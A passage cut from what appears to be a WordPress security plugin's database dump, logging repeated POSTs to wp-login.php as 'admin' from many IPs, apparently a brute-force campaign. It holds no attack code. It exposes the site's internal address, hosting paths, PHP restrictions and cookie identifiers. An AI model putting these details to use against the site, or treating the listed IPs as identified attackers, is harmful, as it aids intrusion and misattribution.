LOAT\";d:1744751591.641825;s:12:\"REQUEST_TIME\";i:1744751591;}}','209.74.67.29',0,'2025-04-16 02:43:13','1970-01-01 00:00:00'),(93687,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+zowQYhaTAwwSAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35712\";s:11:\"REMOTE_ADDR\";s:14:\"152.53.123.145\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744752268.322897;s:12:\"REQUEST_TIME\";i:1744752268;}}','152.53.123.145',0,'2025-04-16 02:54:30','1970-01-01 00:00:00'),(93688,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+08hGLAnCAwUbAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51812\";s:11:\"REMOTE_ADDR\";s:14:\"68.178.168.103\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744753608.486661;s:12:\"REQUEST_TIME\";i:1744753608;}}','68.178.168.103',0,'2025-04-16 03:16:50','1970-01-01 00:00:00'),(93689,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+1l9GLAnCAwZJAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33674\";s:11:\"REMOTE_ADDR\";s:13:\"68.65.120.227\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744754272.4171;s:12:\"REQUEST_TIME\";i:1744754272;}}','68.65.120.227',0,'2025-04-16 03:27:54','1970-01-01 00:00:00'),(93690,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+2QdGLAnCAweVAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59228\";s:11:\"REMOTE_ADDR\";s:13:\"66.102.128.22\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744754951.8150921;s:12:\"REQUEST_TIME\";i:1744754951;}}','66.102.128.22',0,'2025-04-16 03:39:13','1970-01-01 00:00:00'),(93691,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+26xGLAnCAwi0Ag==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41194\";s:11:\"REMOTE_ADDR\";s:13:\"217.156.65.24\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744755628.905654;s:12:\"REQUEST_TIME\";i:1744755628;}}','217.156.65.24',0,'2025-04-16 03:50:30','1970-01-01 00:00:00'),(93692,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+3lRGLAnCAwniAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34390\";s:11:\"REMOTE_ADDR\";s:13:\"63.250.38.213\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744756308.9580131;s:12:\"REQUEST_TIME\";i:1744756308;}}','63.250.38.213',0,'2025-04-16 04:01:50','1970-01-01 00:00:00'),(93693,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+4QRGLAnCAwspAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56490\";s:11:\"REMOTE_ADDR\";s:14:\"103.163.214.43\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744756996.263134;s:12:\"REQUEST_TIME\";i:1744756996;}}','103.163.214.43',0,'2025-04-16 04:13:18','1970-01-01 00:00:00'),(93694,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+5oNGLAnCAw4VAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35620\";s:11:\"REMOTE_ADDR\";s:15:\"185.199.236.107\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744758403.854773;s:12:\"REQUEST_TIME\";i:1744758403;}}','185.199.236.107',0,'2025-04-16 04:36:45','1970-01-01 00:00:00'),(93695,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+6UZGLAnCAw+MAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"15882\";s:11:\"REMOTE_ADDR\";s:14:\"209.97.131.236\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744759110.498832;s:12:\"REQUEST_TIME\";i:1744759110;}}','209.97.131.236',0,'2025-04-16 04:48:32','1970-01-01 00:00:00'),(93696,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+7A5GLAnCAxCSAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55936\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.235.223\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744759823.0009849;s:12:\"REQUEST_TIME\";i:1744759823;}}','162.0.235.223',0,'2025-04-16 05:00:24','1970-01-01 00:00:00'),(93697,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f+8ZZGLAnCAxK1Ag==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 